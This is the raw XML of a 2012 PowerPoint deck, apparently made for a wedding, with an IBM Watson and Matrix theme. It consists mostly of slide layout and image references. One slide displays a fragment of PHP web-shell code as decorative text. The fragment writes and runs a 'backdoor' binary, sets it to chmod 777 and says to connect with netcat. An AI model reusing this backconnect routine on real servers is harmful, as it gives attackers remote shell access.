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4" r:id="rId3"/>
    <p:sldId id="291" r:id="rId4"/>
    <p:sldId id="290" r:id="rId5"/>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="292" r:id="rId7"/>
    <p:sldId id="293" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="294" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="295" r:id="rId12"/>
    <p:sldId id="296" r:id="rId13"/>
    <p:sldId id="297" r:id="rId14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113320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66616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773244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70986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931978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144253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037733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945579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69237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456875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369951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8D69E-A10F-445F-9100-2953EA4D71AB}" type="datetimeFigureOut">
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>20.09.2012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C640D2-1B1A-49AA-85E5-414D62A1050A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9149241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395536" y="404664"/>
            <a:ext cx="82809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if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(!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empty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($_POST['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backconnectport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']) &amp;&amp; ($_POST['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use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']=="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"))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{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gethostbyname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($_SERVER["HTTP_HOST"]);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$_POST['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backconnectport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'];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if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is_writable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(".")){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cfb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",$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backdoor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);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ex("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chmod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777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");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cmd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"./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";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exec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cmd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&gt; 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dev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/null &amp;");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scan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myshellexec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ps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aux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");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if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eregi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("./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",$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scan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)){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data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("\n&lt;/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&gt;&lt;/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&gt;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Process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found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running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,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backdoor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setup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successfully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."); }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elseif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eregi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("./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",$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scan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)){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data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("\n&lt;/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&gt;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Process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not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found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running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,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backdoor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not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setup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successfully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."); }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$_POST['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backcconnmsg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']="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To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connect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,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use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netcat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and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give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the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command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&lt;b&gt;'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nc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'&lt;/b&gt;.$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data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}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else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{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cfb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tmp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",$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backdoor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);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ex("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chmod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777 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tmp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");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cmd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"./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tmp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";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exec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cmd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&gt; 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dev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/null &amp;");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scan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myshellexec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ps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aux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");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if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eregi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("./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",$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scan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)){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data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("\n&lt;/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&gt;&lt;/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&gt;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Process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found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running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,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backdoor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setup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successfully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."); }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elseif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eregi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("./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shbd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",$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scan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)){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data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= ("\n&lt;/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&gt;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Process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not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found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running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,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backdoor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not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setup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successfully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."); }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$_POST['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backcconnmsg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']="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To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connect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,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use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netcat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and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give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the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command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&lt;b&gt;'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nc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ip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por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'&lt;/b&gt;.$</a:t>
            </a:r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data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";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}</a:t>
            </a:r>
          </a:p>
          <a:p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} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -T WATSON</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200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6146" name="Picture 2" descr="D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\blinking-curso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401" y="5540400"/>
            <a:ext cx="238125" cy="18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206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Gerry\Eigene Videos\_Converted\ibm_watson_01_bi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474480"/>
            <a:ext cx="10765496" cy="605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blogs-images.forbes.com/marketshare/files/2012/06/ibm-Log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14" b="8564"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467545" y="332656"/>
            <a:ext cx="2444331" cy="1407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7092280" y="836712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err="1" smtClean="0"/>
              <a:t>orig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708017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Gerry\Eigene Dokumente\Hochzeit Judith 2012\ibm_watson_01_big_optimized_00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20688"/>
            <a:ext cx="9892999" cy="5560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blogs-images.forbes.com/marketshare/files/2012/06/ibm-Log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14" b="8564"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467545" y="332656"/>
            <a:ext cx="2444331" cy="1407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7092280" y="836712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002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217590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1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92696"/>
            <a:ext cx="9764885" cy="548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://blogs-images.forbes.com/marketshare/files/2012/06/ibm-Logo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14" b="8564"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467545" y="332656"/>
            <a:ext cx="2444331" cy="1407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7092280" y="836712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005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56591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Gerry\Eigene Dokumente\Hochzeit Judith 2012\ibm_watson_02_big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6853" y="188640"/>
            <a:ext cx="11757706" cy="6608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7092280" y="836712"/>
            <a:ext cx="611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err="1" smtClean="0"/>
              <a:t>Orig</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="401642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Gerry\Eigene Dokumente\Hochzeit Judith 2012\ibm_watson_02_big_optimized_00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620688"/>
            <a:ext cx="10037015" cy="5641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7092280" y="836712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002</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="499586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Gerry\Eigene Dokumente\Hochzeit Judith 2012\ibm_watson_02_big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620688"/>
            <a:ext cx="9892999" cy="5560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feld 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092280" y="836712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005</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323306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Gerry\Eigene Dokumente\Hochzeit Judith 2012\matrixdiv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2696" y="-515298"/>
            <a:ext cx="7344816" cy="773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D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\matrixdiv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-362900"/>
            <a:ext cx="7344816" cy="773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7092280" y="836712"/>
            <a:ext cx="611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err="1" smtClean="0"/>
              <a:t>Orig</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1264447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D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\matrixdiv2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8287"/>
            <a:ext cx="6502599" cy="684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7092280" y="836712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005</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17410" name="Picture 2" descr="D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\matrixdiv2_optimized_00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30338" y="8286"/>
            <a:ext cx="6502599" cy="684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8451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Rasant…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D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\berguen0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424" y="1358474"/>
            <a:ext cx="6817152" cy="5112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7092280" y="836712"/>
            <a:ext cx="611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err="1" smtClean="0"/>
              <a:t>Orig</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="946578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Rasant…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7092280" y="836712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002</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18434" name="Picture 2" descr="D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\berguen01_optimized_00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5338" y="1358474"/>
            <a:ext cx="6853325" cy="513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3607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Rasant…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7092280" y="836712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005</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19458" name="Picture 2" descr="D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\berguen01_optimized_00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569" y="1358474"/>
            <a:ext cx="6958863" cy="5219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496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Rasant…</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="http://upload.wikimedia.org/wikipedia/en/thumb/3/31/Watson%27s_avatar.jpg/220px-Watson%27s_avat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31404" cy="1169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7092280" y="836712"/>
            <a:ext cx="550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smtClean="0"/>
              <a:t>010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20483" name="Picture 3" descr="D:\Gerry\Eigene Dokumente\Hochzeit Judith 2012\berguen01_optimized_01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415" y="1358474"/>
            <a:ext cx="6985171" cy="5238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951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292</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Bildschirmpräsentation (4:3)</PresentationFormat>
  <Paragraphs>39</Paragraphs>
  <Slides>13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4" baseType="lpstr">
      <vt:lpstr>Larissa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Rasant…</vt:lpstr>
      <vt:lpstr>Rasant…</vt:lpstr>
      <vt:lpstr>Rasant…</vt:lpstr>
      <vt:lpstr>Rasant…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Gerry Brönnimann</dc:creator>
  <cp:lastModifiedBy>Gerry Brönnimann</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-09-17T17:23:39Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-09-20T18:18:17Z</dcterms:modified>
</cp:coreProperties>
</file>